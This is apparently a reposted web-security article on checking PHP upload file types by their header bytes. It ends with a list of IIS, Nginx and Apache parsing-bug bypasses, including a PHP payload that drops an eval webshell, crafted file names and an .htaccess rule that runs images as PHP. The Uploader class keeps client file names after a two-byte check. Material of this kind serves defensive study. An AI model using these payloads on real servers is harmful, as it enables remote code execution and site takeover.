PHP file type Parsing vulnerability defense and attack

Source: Internet
Author: User
Tags: fread, unpack

When handling file uploads, PHP code commonly determines the type of a file in one of the following ways:

1. By the file name extension: unsafe, very easy to spoof.
2. By the MIME type: for some file types the server can also be fooled simply by changing the file extension.
3. By the leading bytes of the file (the header): the scope of what can be decided this way is limited; for example, newer document formats such as DOCX/XLSX are, judged by their header, actually zip packages.

Reading the first two bytes of the file in PHP to determine its true type, with an application example:

function checkFileType($fileName) {
    $file = fopen($fileName, "rb");
    $bin = fread($file, 2); // read only the first 2 bytes
    fclose($file);
    // C = unsigned char. Copies found online often use lowercase c (signed char),
    // which yields negative values for bytes >= 128 and breaks the comparison.
    $strInfo = @unpack("C2chars", $bin);
    $typeCode = intval($strInfo['chars1'] . $strInfo['chars2']);

    if ($typeCode == 255216 /*jpg*/ || $typeCode == 7173 /*gif*/ || $typeCode == 13780 /*png*/) {
        return true;
    } else {
        return false;
    }
}

function file_type($filename) {
    $file = fopen($filename, "rb");
    $bin = fread($file, 2); // read only the first 2 bytes
    fclose($file);
    $strInfo = @unpack("C2chars", $bin);
    // The two byte values are concatenated as decimal strings,
    // e.g. 0x47 0x49 ("GI") -> "71" . "73" -> 7173
    $typeCode = intval($strInfo['chars1'] . $strInfo['chars2']);
    $fileType = '';
    switch ($typeCode) {
        case 7790:
            $fileType = 'exe';
            break;
        case 7784:
            $fileType = 'midi';
            break;
        case 8297:
            $fileType = 'rar';
            break;
        case 255216:
            $fileType = 'jpg';
            break;
        case 7173:
            $fileType = 'gif';
            break;
        case 6677:
            $fileType = 'bmp';
            break;
        case 13780:
            $fileType = 'png';
            break;
        default:
            $fileType = 'unknown';
    }
    return $fileType;
}
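The functions above concatenate the two byte values as decimal strings, which is ambiguous: the bytes 0x07 0xAD give "7" . "173" = 7173, the same code as a genuine "GI" header. The following is an added example (not code from the original article) that compares the leading bytes as raw bytes and, for the zip-package case mentioned above, looks inside the archive to tell DOCX/XLSX apart from a plain zip; the magic numbers are the standard ones for these formats, and the sample file at the end is constructed.

```php
<?php
// Added example, not code from the original article: raw-byte signature matching
// instead of concatenated decimal values, with DOCX/XLSX detection for zip packages.
function detectFileType(string $path): string
{
    $signatures = [
        'jpg' => "\xFF\xD8\xFF",
        'png' => "\x89PNG\r\n\x1A\n",
        'gif' => "GIF8",
        'exe' => "MZ",
        'zip' => "PK\x03\x04",
    ];
    $fh = fopen($path, 'rb');
    if ($fh === false) {
        return 'unreadable';
    }
    $head = (string) fread($fh, 8);
    fclose($fh);
    foreach ($signatures as $type => $magic) {
        // strncmp is binary-safe, so the comparison works on the raw bytes
        if (strncmp($head, $magic, strlen($magic)) === 0) {
            return $type === 'zip' ? refineZip($path) : $type;
        }
    }
    return 'unknown';
}

// An Office document is a zip package whose entries live under word/ or xl/.
function refineZip(string $path): string
{
    $zip = new ZipArchive();
    if ($zip->open($path) !== true) {
        return 'zip';
    }
    $type = 'zip';
    for ($i = 0; $i < $zip->numFiles; $i++) {
        $entry = $zip->getNameIndex($i);
        if (strpos($entry, 'word/') === 0) { $type = 'docx'; break; }
        if (strpos($entry, 'xl/') === 0) { $type = 'xlsx'; break; }
    }
    $zip->close();
    return $type;
}

// Constructed sample: bytes 0x07 0xAD are not a GIF header, yet the article's
// intval('7' . '173') approach yields 7173, the same value as a real "GI" header.
$tmp = tempnam(sys_get_temp_dir(), 'sig');
file_put_contents($tmp, "\x07\xAD" . str_repeat("\x00", 6));
echo detectFileType($tmp), PHP_EOL;
unlink($tmp);
```

A matching header still proves nothing about the rest of the file, so the signature check should be only one gate in front of stricter handling of the upload.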

Example: determining the actual type in a PHP upload class:

/**
 * Read the file header to determine the exact type of the file
 */
class Uploader {

    private $path;
    private $files;
    private $checkFunction;

    /**
     * @param $allow_type The filter type to accept; currently "image" and "zip", can be extended
     */
    function __construct($allow_type) {

        $this->path = getenv('sinasrv_cache_DIR') . 'zhuanqu_files/';

        switch ($allow_type) {
            case 'image':
                $this->checkFunction = 'checkIfImage';
                break;
            case 'zip':
                $this->checkFunction = 'checkIfZip';
                break;
        }

    }

    /**
     * Perform the upload
     * @param $files The $_FILES array
     */
    public function doUpload($files) {

        $this->files = $files;
        $func = $this->checkFunction;

        if ($this->files['files']['name'] != '' && $this->files['files']['error'] == UPLOAD_ERR_OK) {

            $tmp_name = $this->files['files']['tmp_name'];

            // Check the file type
            if ($this->$func($tmp_name)) {
                // Note: the stored name keeps the client-supplied file name, including its extension
                $name = md5_file($tmp_name);
                $name = $name . '___' . $this->files['files']['name'];
                if (move_uploaded_file($tmp_name, $this->path . $name)) {
                    echo 'Uploaded successfully!';
                }
            }
        }
    }

    private function checkIfImage($fileName) {

        $file = fopen($fileName, "rb");
        $bin = fread($file, 2); // read only the first 2 bytes
        fclose($file);
        $strInfo = @unpack("C2chars", $bin);
        $typeCode = intval($strInfo['chars1'] . $strInfo['chars2']);

        if ($typeCode == 255216 /*jpg*/ || $typeCode == 7173 /*gif*/ || $typeCode == 13780 /*png*/) {
            return true;
        } else {
            echo 'Only images in jpg/gif/png format may be uploaded!';
            return false;
        }
    }

    private function checkIfZip($fileName) {

        $file = fopen($fileName, "rb");
        $bin = fread($file, 2); // read only the first 2 bytes
        fclose($file);
        $strInfo = @unpack("C2chars", $bin);
        $typeCode = intval($strInfo['chars1'] . $strInfo['chars2']);

        if ($typeCode == 8075) {
            return true;
        } else {
            echo 'Only files in ZIP format may be uploaded!';
            return false;
        }
    }

}
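The class above stores the upload under the client-supplied file name (extension included) after looking at only two bytes, which is exactly what the image-trojan case below abuses. The following is an added example, not the article's Uploader, of a hardened image-upload step: the whole image structure is parsed, the pixels are re-encoded so that bytes hidden behind a genuine image header do not survive, and the stored name is generated by the server. It assumes the GD extension is loaded and that $storageDir is a directory outside the web root (both assumptions, not from the article).

```php
<?php
// Added example, not the article's Uploader class. Hardened image upload step.
// Assumes: GD extension available; $storageDir is outside the web root.
// $file is one entry of $_FILES (keys tmp_name, error, ...).
function storeUploadedImage(array $file, string $storageDir): ?string
{
    if ($file['error'] !== UPLOAD_ERR_OK || !is_uploaded_file($file['tmp_name'])) {
        return null;
    }
    // getimagesize() walks the image structure, not just the first two bytes.
    $info = @getimagesize($file['tmp_name']);
    if ($info === false) {
        return null;
    }
    $allowed = [IMAGETYPE_JPEG => 'jpg', IMAGETYPE_PNG => 'png', IMAGETYPE_GIF => 'gif'];
    if (!isset($allowed[$info[2]])) {
        return null;
    }
    // Decode to pixels: anything appended after or smuggled inside a valid
    // image (the "picture trojan") is not carried over into the re-encoded file.
    $img = @imagecreatefromstring(file_get_contents($file['tmp_name']));
    if ($img === false) {
        return null;
    }
    // Random server-side name with the extension of the detected type; the
    // client-supplied file name is never used, so it cannot steer any parser.
    $ext = $allowed[$info[2]];
    $dest = rtrim($storageDir, '/') . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
    switch ($ext) {
        case 'jpg':
            $ok = imagejpeg($img, $dest, 90);
            break;
        case 'png':
            $ok = imagepng($img, $dest);
            break;
        default:
            $ok = imagegif($img, $dest);
    }
    imagedestroy($img);
    return $ok ? $dest : null;
}
```

Re-encoding discards GIF animation and may change PNG transparency, which is an acceptable trade for an avatar-style upload but should be weighed for other uses.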

Case: an image trojan fooling the server

Exploiting parsing vulnerabilities

I. IIS 5.x/6.0 parsing vulnerability
IIS 6.0 parsing can be abused in two ways:
1. Directory parsing
/xx.asp/xx.jpg

2. File parsing
wooyun.asp;.jpg

In the first, if a folder under the web site is named with .asp or .asa, every file inside that directory, whatever its extension, is parsed and executed by IIS as an ASP file.

For example, if a directory named wooyun.asp is created, then
/wooyun.asp/1.jpg

will be executed as an ASP file. If the attacker can control the upload folder path, the uploaded image can be given any name and a shell obtained.
In the second, IIS 6.0 does not parse anything after a semicolon, which means
wooyun.asp;.jpg

is treated by the server as wooyun.asp. Besides .asp, the file types IIS 6.0 executes by default also include these three:
/wooyun.asa
/wooyun.cer
/wooyun.cdx

II. IIS 7.0 / IIS 7.5 / Nginx <8.03 malformed parsing vulnerability
This Nginx parsing vulnerability was discovered by the Chinese security organization 80sec ...
Under the default fast-cgi configuration, the attacker uploads a file named wooyun.jpg whose content is
<? PHP fputs (fopen (' shell.php ', ' W '), ' <?php eval ($_post[cmd])?> ');? >

and then requests wooyun.jpg/.php; a one-line trojan, shell.php, is then created in that directory.

III. Nginx <8.03 null-byte code execution vulnerability
Affected versions: 0.5.x, 0.6.x, 0.7 <= 0.7.65, 0.8 <= 0.8.37
PHP code is embedded in an image, which is then requested as
xxx.jpg%00.php

to execute the code inside it.

IV. Apache parsing vulnerability
Apache decides how to parse a file by examining its extensions from right to left; if an extension is not recognized, it moves one further left.
For example, in wooyun.php.owf.rar, ".owf" and ".rar" are two extensions Apache does not recognize, so Apache interprets wooyun.php.owf.rar as PHP.
Determining which extensions are recognized is the key to exploiting this vulnerability; when testing, one can try uploading wooyun.php.rara.jpg.png... (listing the common extensions you know...) to see which extensions are treated as valid.

V. Other
On Windows, files named xx.jpg[space] or xx.jpg. cannot exist; if a file is given such a name, Windows strips the trailing space or dot by default. An attacker can therefore intercept the request and append a space or a dot to the file name to bypass a blacklist. If the upload succeeds, Windows removes the space or dot automatically, which can also yield a shell.
If the server is Apache and .htaccess is honoured and can be uploaded, one can try writing the following into .htaccess:
<filesmatch "Wooyun.jpg" > SetHandler application/x-httpd-php </FilesMatch>

Then upload a shell.jpg trojan; shell.jpg will then be parsed as a PHP file.
